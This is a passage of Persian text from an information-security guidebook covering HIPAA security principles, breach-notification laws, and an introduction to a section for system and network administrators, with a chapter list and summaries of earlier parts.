‫ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺭﺍﻱ ‪ ۲۸‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ‪ ۴۱‬ﺷﺮﺡ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺖ‪.‬‬
‫ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ‬
‫ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻓﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺛﺒﺖ‪ ،‬ﻫﺰﻳﻨـﺔ ﺍﻗـﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﻧﻴﺎﺯ ﺁﻣﻮﺯﺷﻲ ﻛﺎﺭﻛﻨﺎﻥ‪ ،‬ﻭ ﺍﺭﺯﺵ ﺑﺮﺭﺳﻲ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴـﺮﻱ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺩﺭﻧﻈﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﻋﻤﻠﻴﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻛﻪ "ﻻﺯﻡ" ﻭ "ﻗﺎﺑﻞ ﺗﻮﺟﻪ" ﻫﺴﺘﻨﺪ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ‬
‫ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﻧﻜﺎﺕ ﺍﺻﻠﻲ ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ‬
‫ﻣﺆﺳﺴﺎﺕ ﻭﺍﻗﻊ ﺷﻮﻧﺪ‪ ،‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ‬
‫ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺍﻳﺠﺎﺩ‪ ،‬ﺩﺭﻳﺎﻓﺖ‪ ،‬ﻧﮕﻬـﺪﺍﺭﻱ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ‬
‫ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ؛‬
‫•‬
‫ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﻳـﺎ ﻳﻜﭙـﺎﺭﭼﮕﻲ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺧﻄﺮ ﻣﻲﺍﻧﺪﺍﺯﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ؛‬
‫‪United State’s Health Insurance Portability‬‬
‫‪and Accountability Act‬‬
‫‪98‬‬
‫•‬
‫ﺍﺯ ﻫﺮ ﻛـﺎﺭﺑﺮﺩ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﻃﺒـﻖ ﺿـﺎﺑﻄﻪ‬
‫ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﻧﻴﺴﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ؛ ﻭ‬
‫•‬
‫ﺍﺯ ﻫﻤﺎﻫﻨﮕﻲ ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻗﺎﺑﻞ ﺍﻧﻌﻄﺎﻑ ﺍﺳﺖ‪:‬‬
‫•‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺸﻤﻮﻝ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻨــﺪ ﺗــﺎ ﺑﻄــﻮﺭ ﻣﻨﻄﻘــﻲ ﻭ ﻣﻨﺎﺳــﺐ ﺍﻳــﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ؛‬
‫•‬
‫ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﭼﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ‪:‬‬
‫‪ o‬ﺍﻧﺪﺍﺯﻩ‪ ،‬ﭘﻴﭽﻴﺪﮔﻲ‪ ،‬ﻭ ﮔﺴﺘﺮﺓ ﺁﻥ؛‬
‫‪ o‬ﺯﻳﺮﺳﺎﺧﺖ ﻓﻨﻲ‪ ،‬ﺳـﺨﺖ ﺍﻓـﺰﺍﺭ‪ ،‬ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ؛‬
‫‪ o‬ﻫﺰﻳﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬
‫‪ o‬ﺍﺣﺘﻤﺎﻝ ﻭ ﺣﺴﺎﺳﻴﺖ ﻫﺮﻳﻚ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ‪.‬‬
‫ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻄﻮﺭ ﻋﻤﻮﻣﻲ‪ ،‬ﺿﻌﻔﻬﺎ‬
‫ﻭ ﻋﻴﻮﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻋﻤﻠﻜـﺮﺩ ﺳﻴـﺴﺘﻢ ﻭ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ‬
‫ﺍﻣﻨﻴﺖ‪ ،‬ﻣﻨﺘﺸﺮ ﺳـﺎﺯﻧﺪ‪ .‬ﻗـﻮﺍﻧﻴﻦ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ ﺍﺭﺍﺋـﻪ ﻛﻨﻨـﺪﮔﺎﻥ‬
‫ﺧﺪﻣﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺸﺘﺮﻛﺎﻥ ﺭﺍ ﺍﺯ ﺧﻄﺮﺍﺗـﻲ‬
‫ﻛﻪ ﺑﻮﺍﺳﻄﺔ ﺗﺨﻠﻒ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺷﺒﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ )ﻭ‬
‫ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺁﻥ( ﺁﮔﺎﻩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ ﺟـﻮﻻﻱ‬
‫‪ ۲۰۰۳‬ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﻗﺎﻧﻮﻧﻲ ﺗﺼﻮﻳﺐ ﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻫـﺮ‬
‫ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺳﺎﻛﻨﺎﻥ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ ﺭﺍ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻮﻇﻒ ﺑﻪ ﺁﮔﺎﻩ ﺳـﺎﺧﺘﻦ ﺁﻧـﺎﻥ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ‬
‫ﺣﺎﺻﻞ ﺍﺯ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺁﻥ‬
‫ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪ .۲‬ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﱪﺍﻥ‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻓﺼﻞ ‪ .۵‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ‬
‫ﻓﺼﻞ ‪ .۸‬ﺍﻧﻮﺍﻉ ﲪﻼﺕ ﻭ ﺭﻭﺵﻫﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁ‪‬ﺎ‬
‫ﻓﺼﻞ ‪ .۹‬ﻛﺸﻒ ﻭﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ‬
‫ﻓﺼﻞ ‪ .۱۰‬ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ‬
‫‪٢٥٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﺧﻼﺻﻪ ﺑﺨﺸﻬﺎﻱ ‪ ۱‬ﺗﺎ ‪۴‬‬
‫ﺣﺎﻝ ﻛﻪ ﺑﻪ ﻓﻨﻲﺗﺮﻳﻦ ﻛﺘﺎﺏ ﺭﺳﻴﺪﻩﺍﻳﻢ‪ ،‬ﻣﺮﻭﺭﻱ ﺑﺮ ﺁﻧﭽﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ‪ ۱‬ﺗﺎ ‪ ۴‬ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻪ ﻳﺎﺩ ﻣﻲﺁﻭﺭﻳﻢ ﻛﻪ‪:‬‬
‫ﺑﺨﺶ ‪ ۱‬ﻛﺘﺎﺏ ﻳﻚ ﻣﻌﺮﻓﻲ ﺍﺟﻤﺎﻟﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺭﺍﺋﻪ ﻛﺮﺩ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﮔﺴﺘﺮﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ‪ IT‬ﻭ ﺑﺮﺧـﻲ‬
‫ﺍﻋﻤﺎﻝ ﺗﺨﺎﺻﻢﺁﻣﻴﺰ ﺩﺭ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩ‪ ،‬ﻭ ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﭼـﺮﺍ ﺧـﻂ ﻣـﺸﻲﻫـﺎ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ‪،‬‬
‫ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ‪ ۲‬ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻋﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ‪ ،‬ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻧﻔﺮﺍﺩﻱ ﺭﺍ ﺩﺭ ﺑﺮ‬
‫ﮔﺮﻓﺖ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﻓﻨﻲ ﺍﺭﺍﺋﻪ ﺩﺍﺩ ﻛﻪ ﺍﮔﺮ ﺩﺭﺳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﺗﻬﺪﻳﺪ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ‪.‬‬
‫ﺑﺨﺶ ‪ ۳‬ﺟﻮﺍﻧﺐ ﺭﺍﻫﺒﺮﻱ ﻭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﭘﻮﺷﺶ ﺩﺍﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﮔﻔﺘﻴﻢ ﺑﺎ ﻓﺮﺻﺘﻬﺎﻳﻲ ﻛﻪ ﺭﺳـﺎﻧﻪﻫـﺎﻱ‬
‫ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ ،‬ﺑﻨﮕﺎﻫﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ )‪SME‬ﻫﺎ( ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﻪ ﻃـﺮﻑ ﻧﻘﻄـﻪﺍﻱ‬
‫ﺣﺮﻛﺖ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺗﻮﺳﻌﺔ ﺑﺎﺯﺍﺭﻫﺎﻱ ﻓﻌﻠﻲ ﺟﻬﺎﻥ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺷﻮﻧﺪ‪ .‬ﻭﺟﻮﺩ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺍﺟﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﻣﺨﺎﻃﺮﺓ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻋﻤﺪﻱ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺧﻮﺍﻫﺪ ﺭﺳﺎﻧﺪ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪﻫﺎ ﻭ ﺗـﺮﻣﻴﻢ‬
‫ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻮﺯﻩ ‪SME‬ﻫﺎ‪ ،‬ﻋﻨﺎﺻﺮﻱ ﭼﻮﻥ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺗﻌﺎﻣﻠﻲ ﺍﺯ ﻗﺒﻴﻞ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺍﻳـﻦ ﺑﺨـﺶ‬
‫ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺍﺷﺖ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻥ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﺤﻜﻢ ﺭﺍ ﺩﺭ ﺣﻮﺯﺓ ﻣﺤﻴﻄﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺣﺎﻛﻢ ﻛﺮﺩ ﻭ ﮔﺴﺘﺮﺵ ﺩﺍﺩ‪.‬‬
‫ﺧﻼﺻﺔ ﺑﺨﺶ ﭘﻨﺠﻢ ﻫﻤﺮﺍﻩ ﻧﻜﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﺸﻴﻨﺔ ﻓﻨﻲ‬
‫ﺑﺨﺶ ‪ ۵‬ﺑﺎ ﻫﺪﻑ ﻛﻤﻚ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻣﺆﺛﺮ ﻭﻇﺎﻳﻔﺸﺎﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ ﺑﺨـﺶ ﺍﻃﻼﻋـﺎﺗﻲ ﻣـﺸﺮﻭﺡ‬
‫ﺩﺭﺑﺎﺭﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺳﻄﺢ ﻓﻨﻲ ﺑﺎﻻ ﺩﺭﻙ ﻭ ﭘﻴﮕﻴﺮﻱ ﺷﻮﻧﺪ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‪:‬‬
‫•‬
‫ﺩﺳﺘﻪﺑﻨﺪﻱ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺷﺎﻣﻞ ﺭﻭﺷﻬﺎﻱ ﺣﻤﻠﻪ ﻛﻪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫‪Cyber Space‬‬
‫‪1‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺑﺨﺶ ‪ ۴‬ﺭﻭﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺍﺑﺘﻜﺎﺭﻫﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺗﺄﻛﻴﺪ ﺩﺍﺭﺩ؛ ﻭ ﺑﻴﺎﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺩﻭﻟﺖ ﺩﺭﻙ ﺷﻮﺩ ﻭ ﺑﻪ‬
‫ﺍﺟﺮﺍ ﺩﺭﺁﻳﺪ‪ .‬ﺩﻭﻟﺖ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧﻮﺩ‪ ،‬ﻣﻮﻇﻒ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﻤﻦﺳـﺎﺯﻱ ﻭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﻣﻠـﻲ‬
‫ﺍﻃﻼﻋﺎﺕ ﻧﻴﺰ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻛﻨﺪ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻨﺪ ﻛﻪ ﺭﺷﺪ ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﻧﻈﺎﻡ ﺣﻘﻮﻗﻲ ﺁﻧﻬﺎ ﭼﻪ ﺗـﺄﺛﻴﺮﻱ‬
‫ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺑﺨﺶ ﺑﺮﺧﻲ ﺍﺯ ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ ﻭ ﺭﻫﺒـﺮﺍﻥ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﺭﺍ‬
‫ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ ﻭ ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺟﺎﻣﻌﻪ ﺟﻬﺎﻧﻲ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﻌﻨـﻮﺍﻥ ﺭﺍﻫﻨﻤـﺎ ﺑـﺮﺍﻱ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﺩﺭﮔﻴـﺮ‬
‫ﺗﻼﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻓﻀﺎﻱ ﻣﺠﺎﺯﻱ‪ ١‬ﻫﺴﺘﻨﺪ ﺑﻜﺎﺭ ﺁﻳﺪ‪.‬‬
‫‪٢٥٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴﻚ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﻭ ﺷﺒﻜﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ ﺍﻣﻜـﺎﻥ‬
‫ﺩﻓﻊ ﺷﻮﻧﺪ‪.‬‬
‫‪٢‬‬
‫ﺍﺭﺯﺷﮕﺬﺍﺭﻱ ﻧﺘﺎﻳﺞ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﺩﺭﺣﺎﻝ ﺗﻮﻟﻴﺪ ﺷﺪﻥ ﻫﺴﺘﻨﺪ ﻭ ﺗﺤﻠﻴـﻞ ﻧﺘـﺎﻳﺞ ﺛﺒﺘﻬـﺎ ﻭ ﺳـﺎﻳﺮ‬
‫ﻣﺪﺍﺭﻙ ﺟﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪.‬‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﺣﻤﻠﻪ‪ ،‬ﺗﺮﻣﻴﻢ ﻳﻚ ﻧﻔﻮﺫ‪ ،‬ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺍﺯ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﻪ‪.‬‬
‫•‬
‫•‬
‫ﺑﺨﺶ ‪ ۵‬ﺑﺎ ﭼﻬﺎﺭ ﺑﺨﺶ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺯ ﺁﻥ ﺟﻬﺖ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺽ ﻣﻲﻛﻨﺪ ﺧﻮﺍﻧﻨﺪﻩ ﺍﺯ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻓﻨﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
‫ﺍﺳﺖ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻣﻔﺎﻫﻴﻢ ﺑﻪ ﻭﺿﻮﺡ ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻭ ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺩﺍﺷﺘﻪ ﻣﺜﺎﻟﻬﺎﺋﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳـﻦ ﺑﺨـﺶ ﺑـﺮﺍﻱ‬
